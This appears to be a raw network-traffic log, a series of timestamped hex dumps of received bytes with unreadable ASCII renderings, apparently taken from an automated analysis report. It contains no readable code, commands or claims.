                                                                                                                                                2022-09-29 12:48:42 UTC1746INData Raw: 61 cf 88 c6 bd 8e 42 fd dd 45 27 6e 1a 0f 0f 79 d6 ea 71 6c fb 7a 2f 5f 61 d3 19 2c bf a7 78 30 15 22 64 19 77 c8 81 a2 5c bc 57 06 a1 63 fb 6d 47 05 11 ca ed 0d aa e4 8c 22 ba ee 8a 90 fa 95 4f a8 44 5f 1f 61 1a 99 26 cc ab 12 ef 49 90 f3 be 0c e7 5b a6 19 90 da 07 77 14 3a 5a 4b 9a ab 8b 08 9d b2 35 92 19 74 7a ce 3f 05 0d 50 1d 3b 7d c3 b0 8f df d4 d5 76 f8 5b b6 b3 6f 58 02 81 a2 b7 e8 ae 53 99 f2 51 4d 01 b4 17 6f 78 ef a6 ea f6 a4 55 be 64 4f 23 6d 9d 71 ba 19 39 ca e4 31 6a 99 63 d1 3d 48 c2 db c0 67 0c e8 57 50 bf 0d 2e 24 22 d1 c0 69 01 cc 72 62 30 36 31 eb 1c eb 61 bc df 83 09 20 b9 55 02 16 ab 7c 81 56 1b 8d 3e cb a8 89 2d f2 78 32 4f d3 c3 23 8c 9e 32 52 ee fd 43 4c 45 23 60 80 16 18 71 d6 25 4c 3d ff 2a 66 46 78 dc 93 0e 34 41 06 17 01 14 84
                                                                                                                                                Data Ascii: aBE'nyqlz/_a,x0"dw\WcmG"OD_a&I[w:ZK5tz?P;}v[oXSQMoxUdO#mq91jc=HgWP.$"irb061a U|V>-x2O#2RCLE#`q%L=*fFx4A
                                                                                                                                                2022-09-29 12:48:42 UTC1756INData Raw: e6 f3 a4 7a 28 4c 87 a9 b3 1b e7 f9 3b d1 4a 10 69 6e ef 18 df 80 1a 97 6b be 60 9d f9 cd 2a 08 48 02 68 a8 12 b7 3d 03 1f 3b e0 67 54 50 7e 8c 6c aa bc f6 6d 62 29 0f 2b 18 b7 fa 8a 8b f7 02 c1 48 58 54 23 d3 5f f9 02 d9 c2 21 c8 2c a7 ea 37 bc 17 19 f7 79 67 ea eb 8f 1a 47 e5 8c 4f 41 6d 90 9a 7f e7 d9 24 29 f2 b3 54 c7 cb 44 9f b3 6f 25 77 ca 52 4e ab b8 cf 99 a9 be c9 3c 06 54 df 51 bb 1a 57 c1 10 c0 d4 81 d7 02 5a b9 51 e5 1c 4b b5 0d 94 8c 77 5f 09 72 76 2c 62 11 71 fc c6 83 90 f0 45 85 64 a5 52 df 3a a0 02 92 78 cf 3f bf 94 f5 ba fc 42 ca dd 7e 35 db f7 bf 3e 38 71 09 5d 67 08 6a 74 d3 45 c0 be bb 1c 74 9d 4a 56 54 90 71 2a f1 8e 6d 1b ec 13 6e 8a 1d 51 60 fa 4b 88 52 ed db 29 5b 57 56 a3 d2 be 17 90 1b ce 44 e1 31 79 0d 9f d9 27 c0 6c 8d 6b 61 d6
                                                                                                                                                Data Ascii: z(L;Jink`*Hh=;gTP~lmb)+HXT#_!,7ygGOAm$)TDo%wRN<TQWZQKw_rv,bqEdR:x?B~5>8q]gjtEtJVTq*mnQ`KR)[WVD1y'lka
                                                                                                                                                2022-09-29 12:48:42 UTC1772INData Raw: 88 8c 56 f9 23 dc 9c 95 c6 9f fa d0 83 e0 23 9a 56 7c e2 c6 0a 92 91 82 f1 ee 02 f0 95 34 ee 12 04 37 39 e6 c8 c3 6f 05 1a 7d aa 0f 02 51 04 f6 ca af 9d d0 53 c2 ed 99 fb 0d 3e e5 d4 b8 4c 24 5f 3b 05 c4 a0 41 d3 a3 25 f7 79 6a e3 fe 39 78 a7 a7 68 62 08 2a ac 40 7d 56 ef 2b a7 19 7d c9 ba 29 b0 7d 77 f1 89 ae 99 ff f9 5c 4d 27 b3 0c 00 ac fd f7 12 5a c9 60 25 52 3a 88 1a da 9e 2e c4 3d 33 b3 82 2a a0 01 42 7f 9c 05 5c ad b9 db 4b e1 de 32 d8 ec 62 20 c6 08 11 f8 54 2c 24 52 e4 5a 51 15 dc 6f 80 3c 35 23 8f ef 88 ed b2 90 fe aa 3f 16 f5 d2 f3 20 87 4c 14 85 67 0e fa 23 80 a2 92 32 43 4c 6f df 2e 6c 9e 62 29 47 d3 6d 66 96 9d 97 18 93 a0 8d b8 16 08 82 04 dd c6 77 8f 14 5f 18 6f bc bb aa 3f 39 95 92 d7 69 94 53 fe 43 88 20 36 da 19 00 6e ba 98 82 e1 3f 7a
                                                                                                                                                Data Ascii: V##V|479o}QS>L$_;A%yj9xhb*@}V+})}w\M'Z`%R:.=3*B\K2b T,$RZQo<5#? Lg#2CLo.lb)Gmfw_o?9iSC 6n?z
                                                                                                                                                2022-09-29 12:48:42 UTC1788INData Raw: 73 85 87 24 27 f9 49 78 a0 c4 50 a3 15 f0 8b 06 03 76 f8 f4 e0 35 48 14 e8 b6 f2 f4 d0 16 04 df 7c 18 6d 50 fc a3 0f 06 cf c5 07 0a 78 1e 08 4e ce 03 fb a2 cb 0a 1e b3 f3 e9 69 35 5f 54 52 9d 07 ff b8 89 87 e4 e2 dd 57 ed 0c c4 44 07 ea cc ac ef f5 6a 87 d7 6e 14 66 56 14 e1 8b ac 40 aa 88 30 2f 2b f3 46 98 e0 20 d2 e4 26 82 7e 8e f0 63 f8 6b df c3 09 6a 66 63 c2 9f 8a 2d 63 06 15 dc e2 4c 08 f4 df f6 cf f6 6b b0 c2 1d 21 04 f1 93 e7 2d 1a c2 03 e1 7f d8 cb a2 ae 1a a6 e5 b5 a3 9b fd b2 d1 30 4a c1 cf 0b eb 36 d0 e9 c7 d7 9f 02 aa 16 84 79 71 1f ce 34 35 bc d9 d5 14 9a 8c 0d 4e ca dc be 9f 85 81 50 93 a3 7f 8e 36 b0 93 9d bc f1 6a 29 bb d0 7a ae ad d1 c9 90 b0 c8 6b 9c fc b6 a7 6d 5c 15 ac 81 ca 57 4d 45 6b 66 97 e0 6c d6 9f 38 ad 97 eb a4 9f e9 25 d0 88
                                                                                                                                                Data Ascii: s$'IxPv5H|mPxNi5_TRWDjnfV@0/+F &~ckjfc-cLk!-0J6yq45NP6j)zkm\WMEkfl8%
                                                                                                                                                2022-09-29 12:48:42 UTC1804INData Raw: 89 60 c3 6f 82 c2 94 7d 4b b8 25 fa 57 94 a2 f0 d6 c5 a7 c0 48 ea 23 dd 9f 99 50 cb 83 ae 37 fc ed 86 b1 64 90 9b 9f aa 2e e2 e9 2e ca 52 d7 a5 14 b7 bb f6 4d e3 36 f9 20 e6 dc 97 47 4d 4a 6d b9 0a 3f 7d ee 88 ad 3d 50 b4 ca 07 e3 ce 71 d5 fb 89 01 b3 81 69 e3 82 49 3d ee ea 95 06 bd d4 24 4f e0 f3 9f 77 f7 fb 78 72 2e f5 f0 02 5c 71 a0 20 b3 62 67 fa eb df 5e a6 e2 92 cf 8b 55 55 51 c8 5a 59 0b 8b b5 e1 4a a6 b7 bb 3f 29 dc 42 7a 83 dd e4 7b fa d0 bf e0 9a b8 46 a4 e5 c2 35 75 9f 3e e5 1e 5a c6 7f 2e e8 bb 1d 2f 30 14 2a d7 03 f8 2f 7d cf a4 96 d2 d6 ee ae 44 ee 08 9f f6 85 3c f1 e2 e8 82 b1 0b 4d c2 9c c1 7e b5 e1 fc 24 5e fa cb c6 5f 2a 3f e3 74 3f fc ec f5 0b 21 cd 57 36 e9 2e f6 a3 4e 2c 50 b7 26 f4 83 17 84 b7 22 58 45 29 1a 35 1f 7c 4e b4 a5 9c a8
                                                                                                                                                Data Ascii: `o}K%WH#P7d..RM6 GMJm?}=PqiI=$Owxr.\q bg^UUQZYJ?)Bz{F5u>Z./0*/}D<M~$^_*?t?!W6.N,P&"XE)5|N
                                                                                                                                                2022-09-29 12:48:42 UTC1820INData Raw: 5b ac cd d4 00 70 3b 14 04 47 b4 e7 ab 0f dd 2b c9 5b f8 f5 51 f4 15 09 16 a5 15 90 71 a2 d6 08 18 59 8f e5 5a 57 ab 9a bc 83 1b df 78 bf 0a 36 a5 f9 cf 10 6e ea 09 7b 22 f9 2f df 37 3e 5b cf 30 72 c8 bd af 13 41 c3 1a 9f 77 35 44 37 87 4e 95 7c 4d e4 0e 04 a2 40 ff 74 43 20 f4 df d9 c8 13 d8 31 1f 18 ee de 30 09 0f 1c fc 97 3f f4 56 c1 6e 8c 2c b3 58 bd 99 47 5a 42 31 34 0b da d1 65 3a 25 51 b2 8f 53 28 0a 86 f8 c5 4c d4 17 08 c4 8d 1f 6e ec 6e b8 78 31 88 53 14 bf 41 64 27 65 9b 5a 12 da a2 41 be 86 1e 58 fe a9 4f 77 99 e7 8e 77 52 b9 94 f9 34 ee 97 2c 47 75 5b 61 28 e8 26 8d ed 85 0e d1 b2 d4 37 96 fd 58 99 98 b8 f1 88 8b c4 91 76 34 fc a1 be 9d c4 cf de 87 9a aa ca 5e 6d c1 86 70 e0 d8 85 84 44 53 c4 37 9f 7b 42 3d 56 18 a6 5c 0a 09 2b 49 cf 7e 59 68
                                                                                                                                                Data Ascii: [p;G+[QqYZWx6n{"/7>[0rAw5D7N|M@tC 10?Vn,XGZB14e:%QS(Lnnx1SAd'eZAXOwwR4,Gu[a(&7Xv4^mpDS7{B=V\+I~Yh
                                                                                                                                                2022-09-29 12:48:42 UTC1836INData Raw: 04 85 36 19 f3 b9 24 3f 49 8e 8d 8f 43 70 f3 0d f2 23 e5 2f a2 41 99 fb 17 c0 51 c8 1f 85 eb 28 a9 07 ef 68 03 82 28 e0 58 29 b9 64 ac fd dd 38 a7 3b e2 df b8 b3 b4 b8 4f d0 4b 46 20 6e 42 85 d4 ae 71 a3 4c b4 63 c8 bc ad 30 ce cd 1c 2d 31 2d 96 56 81 8e 13 bc 7a b0 bd 7e 10 2c 2d aa 12 26 30 ad 8f 3c c6 a6 cd f3 27 53 6a 9e cd c0 7e 2e 71 a8 df c4 88 d2 08 90 f1 ef 39 0c 34 bf 94 02 24 2e 1c b2 06 2b 7b 21 4e b9 16 32 bf 63 c6 44 0f ba 7e 55 14 a0 4f 3d a3 81 fe 66 de c3 9a 36 6e f6 4f 5b ec 17 92 1b 06 de 7e 25 af fa ed d5 86 09 bd fc ba c0 a8 1d b0 92 d5 53 c1 c1 e3 15 a7 14 8d 36 e2 fb 51 a7 1e 90 03 dd 98 06 28 87 aa da a2 10 c2 e4 95 63 59 df 36 5e 36 aa 44 ba be 7e 64 13 ab c9 fa 11 20 7d 10 df 30 db 12 1d 1a 67 89 02 e0 32 47 53 f4 f3 40 f3 16 ab
                                                                                                                                                Data Ascii: 6$?ICp#/AQ(h(X)d8;OKF nBqLc0-1-Vz~,-&0<'Sj~.q94$.+{!N2cD~UO=f6nO[~%S6Q(cY6^6D~d }0g2GS@
                                                                                                                                                2022-09-29 12:48:42 UTC1852INData Raw: bb 55 9e b6 b6 c7 ca 86 ba 38 23 68 54 fd 47 88 54 05 f7 29 cf 20 d6 5f 2b 8d 3a 2a d3 a9 d0 6b 8a f1 e9 f3 6c 01 5c d0 81 65 12 70 4f 2d 39 e5 88 10 9f 1f 04 b6 1e c7 b6 b2 5d 35 92 d9 76 21 03 69 d3 67 1c 42 ee 87 6c 1d 0f c5 b8 e8 5b 5f 8c b0 f4 ee 17 ed e5 27 65 8c ff 8d 4d 22 68 fa 17 a2 1c ca 27 be d9 0c 3c 8a 62 0e ea 74 5a 78 6f 3f 29 60 4c 2d 13 bd 77 0d 26 f5 7b bb 17 02 7b 55 67 9d 15 85 69 a8 13 89 51 b1 b2 ac a0 5c 3b 96 81 68 1e cc 25 b7 7f 3e c7 2c f3 63 fe d2 3a 8e 16 87 02 80 ef 17 2e e9 1a 04 d7 18 cf 9b b7 70 97 38 21 6b 42 99 9e 05 6a b0 1c 30 2f 4b 04 14 bf 7b d8 ee 6c d1 2f c0 12 5a 0d 90 e2 50 e6 04 36 70 d6 77 e1 58 6d 57 3b 77 b2 9c e1 c5 73 6c dd 5b 4e 8f 93 87 2b ca 01 ca c4 38 c2 52 93 e3 07 64 dd e7 91 8b b7 ee 27 c6 87 79 f2
                                                                                                                                                Data Ascii: U8#hTGT) _+:*kl\epO-9]5v!igBl[_'eM"h'<btZxo?)`L-w&{{UgiQ\;h%>,c:.p8!kBj0/K{l/ZP6pwXmW;wsl[N+8Rd'y
                                                                                                                                                2022-09-29 12:48:42 UTC1868INData Raw: a3 43 e6 11 96 60 32 74 20 a2 f9 00 9c 97 20 83 20 84 ff 1d 5a 69 f5 10 75 8a 42 d8 ae 82 33 28 7f e1 77 46 e7 a1 50 ac da 4c 72 01 14 56 e3 76 0a 8e 0b f2 63 92 26 77 27 1a d8 ae 1b 8c 6a 28 30 09 d7 c8 0a f1 74 4b f8 f4 cf f3 fa ca 84 16 2d 74 1a 3f 34 cb 2e 95 8a 94 c0 c3 23 e4 35 43 db 55 54 d4 1b 14 5c 5c ab c0 38 8e cc 6b 14 28 e5 35 c4 23 37 79 e6 55 ef d3 98 ac 3e 44 a9 0f 0d 06 86 61 6c e6 03 35 1f e2 1e 70 28 22 49 54 df 5a 76 11 65 60 b7 d6 60 0b 59 43 2d 5e c8 b2 c4 d5 12 ec ce e7 3c b8 44 71 9f 4c 20 ec 10 8c 47 f2 49 10 f9 29 36 0f f7 af 84 73 9b 34 f6 ec b3 f9 25 64 28 da a6 32 ea eb 32 94 d1 08 6e 74 bb 8d 93 9d 2a 1e cd e0 2d be 4f 2b c6 a7 1d 1c 3b 14 15 38 79 97 f3 a0 f4 37 ed 0c 6d fe e5 fe a2 03 59 5b ae 61 de dc e9 88 f3 e0 ba b2 d8
                                                                                                                                                Data Ascii: C`2t ZiuB3(wFPLrVvc&w'j(0tK-t?4.#5CUT\\8k(5#7yU>Dal5p("ITZve``YC-^<DqL GI)6s4%d(22nt*-O+;8y7mY[a
                                                                                                                                                2022-09-29 12:48:42 UTC1884INData Raw: fa f0 1f ba dc 51 f0 33 e8 a2 80 a7 eb 8a ba 6d 63 0b d7 6c 30 f0 3c 85 c5 ab 16 5f 6f 12 bb b2 31 33 e1 ba 69 c8 79 f0 8a 0a da fc 75 de d0 d9 e7 5f 0b ad c9 8d 91 c1 93 8d 06 f8 5d a5 35 a1 16 72 5f 0a a1 37 b0 47 58 64 d2 c2 cd 57 88 e9 fa 2b 59 6c a1 89 32 6f 55 62 1a 7a 19 a9 0a 79 ed d6 00 7a f1 d7 76 3f f7 87 7b 31 eb fa 0d 3d 80 18 5a 13 a6 46 11 8c 2f b0 88 83 41 92 c4 de 84 29 4f 97 7a ba fb 1b 07 e3 d3 b2 76 69 64 bc 06 5a 56 73 77 ae ba 13 af 0b 57 7b 9b c4 85 6c 88 49 1f 01 98 c1 51 3f 9c 7a 46 9b 20 bb 0a 85 81 91 17 1d 72 32 77 a8 0b 87 9d de cd 0e 1c 5e 5d 89 ec 95 e6 cb 36 a1 fc 08 94 64 d8 60 7b b7 f9 fb 49 90 cd 3f 1e bd 27 6e 68 f5 c1 21 dc 3b e7 a5 84 3e ed f6 7a d3 3b 50 d2 7e 6d 69 24 94 b5 c4 5f 54 0f 04 1e ab b3 77 fd 0a 4b 95 03
                                                                                                                                                Data Ascii: Q3mcl0<_o13iyu_]5r_7GXdW+Yl2oUbzyzv?{1=ZF/A)OzvidZVswW{lIQ?zF r2w^]6d`{I?'nh!;>z;P~mi$_TwK
                                                                                                                                                2022-09-29 12:48:42 UTC1900INData Raw: d9 eb f1 41 34 ac f0 17 cf 52 f4 71 95 6f 77 53 07 bc 2d c8 c8 aa 2e 7b 5d 7d 1f 8b 58 e7 94 a5 76 91 b8 da f5 6d 65 ab f0 67 ff 91 88 1b 34 27 1a fd 35 cd c7 94 ad 17 07 8c 96 69 81 c9 09 de 4b 53 4f e5 37 ba 20 af 50 fa dc 81 9d fb 7c 73 df f1 48 82 52 e7 4c 5d 58 ab b6 17 bb 21 4e 2e 46 bf c3 13 5e 3b f7 53 92 17 f6 87 33 29 f7 86 f2 d1 af 1d 6d 1f 55 12 c4 71 3e 9f 82 6b 88 af 65 59 d4 14 17 2a 84 2b 67 04 62 15 72 e8 d3 90 dd f8 5a 5e 5d f1 a3 bc a3 f7 c5 b1 6d 95 08 8d 46 32 18 9b 65 ab e7 ba 2f ce 86 4d 67 f9 20 de 01 f5 48 ac 18 ee f3 7f b3 61 3f 29 be e6 d5 3c d6 b7 c8 4a 51 6f 86 74 ad b0 92 a4 4d bb a3 28 aa e1 e1 c5 8f 3c c6 70 dd a1 17 7f 1e 39 71 72 17 cf cc d6 87 b7 59 ca 75 02 12 9f cb 4d 98 46 2f 8c 2b 07 11 88 08 64 08 b1 6c da ab b6 f9
                                                                                                                                                Data Ascii: A4RqowS-.{]}Xvmeg4'5iKSO7 P|sHRL]X!N.F^;S3)mUq>keY*+gbrZ^]mF2e/Mg Ha?)<JQotM(<p9qrYuMF/+dl
                                                                                                                                                2022-09-29 12:48:42 UTC1916INData Raw: 9b 71 0d 36 2a f9 2e 58 d1 20 10 44 45 b6 ea 45 2d 08 78 5e 93 22 df d7 3e 4c 7d bc a0 c3 39 c8 30 3e 24 1d 4d 3a 31 b4 5d 75 81 75 27 f1 49 58 d7 7f b4 16 66 a2 14 6f 94 0e 2c 57 83 c7 5c 42 91 9b af 89 6f 17 2e 2f 8a b1 2c 3b 6a a7 f6 8c d8 e7 ac bf 2c cf ef 1d 81 6a 6a ea 99 29 56 5a 47 b3 64 21 ec 2b dc 73 fa ca cd 34 46 9f cd 6d 67 ef 6b e4 f4 c0 01 d9 47 14 3c d9 b6 04 74 c7 01 3c 07 b5 e2 64 0f 77 5c 11 82 8f 05 ad 2f c5 0f 60 34 64 e5 25 a8 2f 26 be e5 68 f6 41 51 2a f4 73 a6 54 88 11 c8 70 ca e6 8d 24 94 5b 68 38 e2 31 dc 8d da 78 fc 2a 7a 97 c9 81 bb 25 be 02 37 68 0b 0e d8 43 8d 68 6b 41 fc 80 8a 4f 41 92 6c 91 dd 8b 04 f7 a3 44 2d cc d2 39 ad 79 c6 42 5b 32 75 19 95 78 47 2a 7f b9 12 07 45 ca 7b df f0 63 f3 b2 f6 e9 1e 8e 5e b3 ed 7f ef aa 7b
                                                                                                                                                Data Ascii: q6*.X DEE-x^">L}90>$M:1]uu'IXfo,W\Bo./,;j,jj)VZGd!+s4FmgkG<t<dw\/`4d%/&hAQ*sTp$[h81x*z%7hChkAOAlD-9yB[2uxG*E{c^{
                                                                                                                                                2022-09-29 12:48:42 UTC1932INData Raw: 0f 78 e8 fc c8 7c 6a 4e 8f 89 15 01 4f d7 9e 35 cc f7 c8 c1 e3 0b 6a 3e 8d 39 45 af 2a 9e b0 8d bf 96 aa f7 52 6a cd 7e 7f 5d 2e b2 59 01 90 50 70 87 a2 d7 f6 94 72 fe b0 c0 de 32 c1 84 bb 2b a9 cc 24 05 d3 2f fa 87 a8 7d 73 d3 5e 88 a1 5d 4b 4d 7f c4 10 d5 c1 a6 6f 59 92 b9 07 8c 86 ed db 75 ae c5 4e bc 91 3f 65 d3 03 5e 9a 3b 81 bf da 15 44 42 25 68 8d dc 89 2f e2 83 ef 17 37 51 83 6c c0 a7 d2 e6 ef 22 85 4b 11 64 38 a9 32 17 94 9d c0 73 0c 6e 93 50 34 19 3e 8d 80 55 f7 2f 89 32 25 4e 97 a4 d7 c4 90 20 a7 a4 73 a8 63 64 62 21 fd b0 41 03 f0 78 c9 21 db f0 fb 39 24 02 a5 16 bf b1 2a f9 d5 c0 47 01 31 da 67 cd 9f 68 45 53 72 73 e0 a8 96 ca cb e0 b9 b4 be 45 01 73 ab 2e 77 a1 17 4b f5 ed 81 92 c3 78 38 a7 6b 06 6b 7c 66 36 db cc 29 10 25 bd 25 cd eb 85 80
                                                                                                                                                Data Ascii: x|jNO5j>9E*Rj~].YPpr2+$/}s^]KMoYuN?e^;DB%h/7Ql"Kd82snP4>U/2%N scdb!Ax!9$*G1ghESrsEs.wKx8kk|f6)%%
                                                                                                                                                2022-09-29 12:48:42 UTC1948INData Raw: 4f 48 5f f9 e7 15 9a 65 7e 4f 98 b6 f3 8f d7 16 f5 6e 45 99 1b 80 62 13 53 1e 8a ec 34 34 78 60 69 82 c1 a3 d8 7c 69 38 fc 66 cc 6d e9 8d 2b f6 a2 f7 ae b0 de 71 08 dc f7 a3 c5 e4 7a 6b ff 17 d8 79 37 fa 48 77 c4 a1 1f 33 5d 46 e7 77 35 56 ee 64 1c a8 34 81 36 ca cd 83 b8 36 74 24 4a 0e 44 e3 cd 4f b3 7d 31 5f 17 50 bd 49 95 b5 fa 5a 69 b3 f0 c1 00 e7 cd fc 75 60 31 e2 94 1b 6b 9e c1 ff 4b 47 23 1d 88 89 80 0f 1b 39 da 1a 50 43 c4 6a 4f 4d f0 19 8e 00 1d 84 f8 5d 81 2d 66 70 74 ea 69 ba e5 67 f7 71 18 92 17 f1 af ed d3 94 0c aa 58 bd e4 2d a0 08 7b 0b d0 46 9d a5 6c 5a 73 f3 cb 09 9e 3d 18 f3 0b 3a db 67 28 2c d4 7f 30 c3 17 1b a9 88 db 1f a2 5c 7e 8f 6f e6 8c 62 40 89 cf df e4 91 a4 3a 39 98 7e 25 33 35 dd b4 6c a9 c1 61 63 b1 fc 1c 83 46 44 84 17 e2 c0
                                                                                                                                                Data Ascii: OH_e~OnEbS44x`i|i8fm+qzky7Hw3]Fw5Vd466t$JDO}1_PIZiu`1kKG#9PCjOM]-fptigqX-{FlZs=:g(,0\~ob@:9~%35lacFD
                                                                                                                                                2022-09-29 12:48:42 UTC1964INData Raw: 9a ec 4f f6 71 36 f7 bc 2b f2 20 89 4e 9f 87 55 50 4f 63 f3 e8 4c 64 73 d1 7f b9 0a e2 cc a3 a6 41 04 11 46 40 8f a5 8f 3f 23 6e f8 85 92 86 c9 9e 54 c7 a9 3d d6 e9 54 02 6c 02 4c 05 27 16 3d 0b db af cf bb bb e9 ba f8 66 45 52 65 6f bd 2b 3c 84 af 4e 58 aa 54 96 80 4b 2d 69 5c 0a a2 31 2c 39 e1 fc 57 c0 d9 e4 ba aa c8 40 cd 24 e7 dc c3 b5 43 a8 ec 9d 65 e0 05 b7 d6 4f a4 fb d4 1e e8 d5 ca 5e 28 c2 dd d4 1d 1d 64 bc f5 d6 92 7d c7 83 29 d1 40 bd 4e 5b 69 77 ce 73 43 1f df 47 78 6e 5c 23 9d d2 48 4b ab 7f 6f fa b1 78 60 aa 47 7c 46 44 c6 d3 46 70 99 74 d7 8d 97 4e 72 68 e1 03 3f 26 f3 21 28 73 74 dd b2 48 10 a9 1b 46 aa a7 f5 65 c6 00 49 95 15 01 ba 7e 6c a1 96 29 b4 33 b3 31 19 ae 77 07 4e 86 96 4f 9d 22 94 df 21 3f 06 2d 62 e2 c3 c8 9a 20 32 d2 75 5c 30
                                                                                                                                                Data Ascii: Oq6+ NUPOcLdsAF@?#nT=TlL'=fEReo+<NXTK-i\1,9W@$CeO^(d})@N[iwsCGxn\#HKox`G|FDFptNrh?&!(stHFeI~l)31wNO"!?-b 2u\0
                                                                                                                                                2022-09-29 12:48:42 UTC1980INData Raw: 2c 11 e6 5a d9 6f 8e 4c 03 4f 61 b6 bc 34 ef a2 09 51 81 6f ec 23 d3 77 6f 1f cb ea 71 5d 2a 61 d2 e8 c4 76 b8 9e ba 2c e2 80 16 b6 df e6 18 7f 86 86 1b 9b e2 f9 cc 27 c3 6f d4 cd 9a d3 e7 b2 1f 2f 01 32 51 3f 09 82 43 41 e3 2b df c0 07 2e 16 ab 28 d4 c6 72 57 49 c5 65 2d b6 b2 a4 35 d6 3a 28 f2 01 c0 d7 9f 32 a4 c5 56 73 f4 b1 16 99 30 be 84 74 47 b9 4b 7e 64 01 9d e3 0f 53 f7 fd 3b 2b 2f 52 5a b3 6b 16 83 e2 ee 9e 02 2c c4 70 af d5 1c f1 03 38 3f 3b 8c 3a 54 b8 e4 47 eb cc dc a7 9e 14 96 19 8c bc c0 c3 7c db e5 49 35 fd 70 1d 2f 39 b3 23 48 93 bf d7 c9 28 75 77 82 32 64 ce 2b 2a 47 98 a9 76 bd fa 8a 68 a0 50 3b 67 53 39 50 fb c7 54 67 7c c2 ae 8c ad 9b 95 35 2a 75 e1 c8 28 d9 d4 12 c0 77 5e ac f6 46 1b 66 4f ea 60 d3 40 95 eb 69 0b a7 a7 6c 72 5a f2 0c
                                                                                                                                                Data Ascii: ,ZoLOa4Qo#woq]*av,'o/2Q?CA+.(rWIe-5:(2Vs0tGK~dS;+/RZk,p8?;:TG|I5p/9#H(uw2d+*GvhP;gS9PTg|5*u(w^FfO`@ilrZ
                                                                                                                                                2022-09-29 12:48:42 UTC1996INData Raw: 2d 80 0a 81 41 a7 c1 b1 3a 98 01 24 b3 00 24 87 65 3b cc df c8 fd e1 5c 75 73 f9 28 82 20 ab 8d 16 6e 55 10 88 e4 29 5a a7 ff a9 83 7e 4b b7 79 a7 b3 e3 27 88 c7 91 71 cd f1 ee 29 97 d1 cf 9a d0 b5 8d 39 d8 5b ca 2a 52 9e 69 4a c6 2a 9f b8 5e c8 47 27 a5 85 ca 01 cb f1 89 22 e7 af 1c 07 65 41 2a 99 6e 62 1f f9 14 27 54 d1 6c 6d e1 1c 50 5d 2d d0 9b ab d8 b8 fb 59 64 e7 b8 21 f8 24 91 1e a1 ed 8a 1c c9 f7 40 f2 a1 e2 77 28 c9 79 d7 bb 88 bd 12 df 83 05 72 14 ce 63 58 8c 59 1a c8 d9 f6 dd a2 a0 d4 87 e6 13 3e 22 22 62 41 6f 28 6d 67 ab 2d b8 73 db 3c f5 19 b1 4e f0 c5 e8 71 96 11 e3 fe f3 12 e8 7d 42 da 0f 42 6d ac b5 2c f1 e8 d1 82 0b 9d 8e da db 88 24 a0 08 f6 59 42 7c c3 7b 9d ea 76 1c 6a e9 60 c1 d7 08 07 db af a7 1a ea 1b c8 cf d8 88 d6 fa 8f d3 9c ef
                                                                                                                                                Data Ascii: -A:$$e;\us( nU)Z~Ky'q)9[*RiJ*^G'"eA*nb'TlmP]-Yd!$@w(yrcXY>""bAo(mg-s<Nq}BBm,$YB|{vj`
                                                                                                                                                2022-09-29 12:48:42 UTC2012INData Raw: 2e 4b 08 f7 75 e8 66 22 a8 b0 9b d1 22 60 aa 7b 1f f5 f7 f0 dd 87 8a 9a 5c 0d 67 74 c2 20 43 b7 ac bd c3 9f da 66 66 7c fa 46 8e 3b 49 3b 76 b9 62 95 af 6c e5 f9 a7 f9 d8 7f 4b 4f a6 4d 27 a6 62 9d fd 1f d7 53 aa fa 5f ec 9c 0c af 97 29 f3 10 c0 be b1 ac 0b 1a f0 38 29 98 4c d8 44 d6 b3 12 bf 60 ea e1 78 9a 36 4f db 46 37 a8 1b 0f 4c 69 d9 3e 55 99 24 33 84 6d 49 6d d7 d8 30 ef f3 ca 5a 06 cd 93 a9 91 82 53 28 84 f7 66 5b 41 b1 25 11 e2 f5 c7 be b5 91 10 2f da 53 69 2e 63 86 68 35 24 c6 71 5d e2 64 41 7d 42 c5 52 3a 48 99 b5 e7 db fc 28 c9 4f d9 3f 3f 39 40 f4 73 be 99 39 56 15 44 c8 a4 dc 4c 75 66 6c 27 51 b7 4d ba 0f 8f 17 79 18 52 04 32 9e b4 cb 72 37 ce 13 f5 84 15 4d 6e 4d 4d 00 41 7a c6 7d 03 50 b5 1b 49 38 ec 2f 35 fa 6d 11 63 d0 60 b4 d0 cb 3b df
                                                                                                                                                Data Ascii: .Kuf""`{\gt Cff|F;I;vblKOM'bS_)8)LD`x6OF7Li>U$3mIm0ZS(f[A%/Si.ch5$q]dA}BR:H(O??9@s9VDLufl'QMyR2r7MnMMAz}PI8/5mc`;
                                                                                                                                                2022-09-29 12:48:42 UTC2028INData Raw: 6f 5a 7e 69 13 57 de 5f 31 95 96 1e 15 95 c6 f2 4d 49 68 37 92 a5 25 9d 0a 8b 26 56 f7 6e 82 09 99 01 65 3e 0f 54 48 7d 53 39 3d de a5 bf d2 b0 a9 64 6b 3f 3e 9f 02 f1 01 06 aa f4 eb 96 53 3f 03 c8 d1 b9 b6 2f eb 77 ea 95 8c db bf 62 96 ae 4d d6 4e cb e9 98 9d 78 17 01 81 bf 6d 13 da f4 89 a1 eb df fe 1e 32 09 52 bd fd 50 eb cd 22 ef 07 03 e6 98 c0 b1 c0 62 e4 d4 44 b6 6b e1 03 08 93 b1 5d 95 cb 23 73 b3 cd 49 d6 4f bf a5 fc 79 90 e6 3d 9a b2 e5 42 12 2e f3 f9 3b 87 b3 c9 c4 40 05 5d 85 da 8c f0 22 9a f9 51 e1 7a 3b 01 23 9a a9 e9 94 02 fc 1f c6 bf 6b e6 e3 11 dc 45 14 b1 fe 8a 06 33 b9 01 e2 ee 40 52 e1 87 2c e3 e6 81 4d 11 27 40 90 f1 e1 85 b5 74 28 d3 96 7e 21 cd f1 d3 ee b6 9b 80 a9 ed a4 1c ec 06 73 90 58 f5 72 2b b3 29 d5 f1 5f 7c 1f 6b 6a 55 98 78
                                                                                                                                                Data Ascii: oZ~iW_1MIh7%&Vne>TH}S9=dk?>S?/wbMNxm2RP"bDk]#sIOy=B.;@]"Qz;#kE3@R,M'@t(~!sXr+)_|kjUx
